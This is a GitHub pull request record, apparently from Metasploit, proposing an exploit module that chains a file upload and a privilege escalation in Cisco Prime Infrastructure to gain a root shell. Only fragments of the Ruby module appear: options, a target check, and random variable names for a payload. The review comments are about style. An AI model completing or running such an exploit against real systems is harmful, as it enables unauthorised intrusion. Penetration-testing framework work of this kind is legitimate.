### PR TITLE
Create exploit for Cisco Prime Infrastructure RCE

### PR DESCRIPTION
**Pull request by pedrib**
This module exploits two vulnerabilities in Cisco Prime Infrastructure to achieve RCE as root. The first vuln is an arbitrary file upload, allowing us to get rce as an unprivileged user. The second vuln is a privilege escalation to root.

This module has been tested in Prime 3.2 and 3.4. Please check the description and links on the module for more details, and have fun popping this easy shell.

### CODE REVIEW

File: modules/exploits/linux/http/cisco_prime_inf_rce.rb [hunk 1]
```diff
@@ -0,0 +1,193 @@
+
+##
+# This module requires Metasploit: http://metasploit.com/download
```
Comment (bcoles) [inline modules/exploits/linux/http/cisco_prime_inf_rce.rb]: `https`

**Comment by pedrib** [comment]
Created PR #10767

File: modules/exploits/linux/http/cisco_prime_inf_rce.rb [hunk 2]
```diff
@@ -0,0 +1,193 @@
...
+      [
+        OptPort.new('RPORT', [true, 'The target port', 443]),
+        OptPort.new('RPORT_TFTP', [true, 'TFTPD port', 69]),
+        OptBool.new('SSL', [true, 'Use SSL connection', true]),
+        OptString.new('TARGETURI', [ true,  "swimtemp path", '/swimtemp'])
+      ])
+  end
+
+
+  def check
```
Comment (bcoles) [inline modules/exploits/linux/http/cisco_prime_inf_rce.rb]: Golfed / tidied:

```ruby
  def check
    res = send_request_cgi({
      'uri'    => normalize_uri(datastore['TARGETURI'], 'swimtemp'),
      'method' => 'GET'
    })

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    if res.code == 404 && res.body.length == 0
      # at the moment this is the best way to detect
      # a 404 in swimtemp only returns the error code with a body length of 0,
      # while a 404 to another webapp or to the root returns code plus a body with content
      return CheckCode::Detected
    end

    CheckCode::Safe
  end
```

File: modules/exploits/linux/http/cisco_prime_inf_rce.rb [hunk 3]
```diff
@@ -0,0 +1,193 @@
...
+    native_payload_name = rand_text_alpha(rand(6)+3)
+
+    var_raw     = rand_text_alpha(rand(8) + 3)
+    var_ostream = rand_text_alpha(rand(8) + 3)
+    var_pstream = rand_text_alpha(rand(8) + 3)
+    var_buf     = rand_text_alpha(rand(8) + 3)
+    var_decoder = rand_text_alpha(rand(8) + 3)
+    var_tmp     = rand_text_alpha(rand(8) + 3)
+    var_path    = rand_text_alpha(rand(8) + 3)
+    var_tmp2     = rand_text_alpha(rand(8) + 3)
```
Comment (bcoles) [inline modules/exploits/linux/http/cisco_prime_inf_rce.rb]: Inconsistent indentation.

**Pull request closed without merging**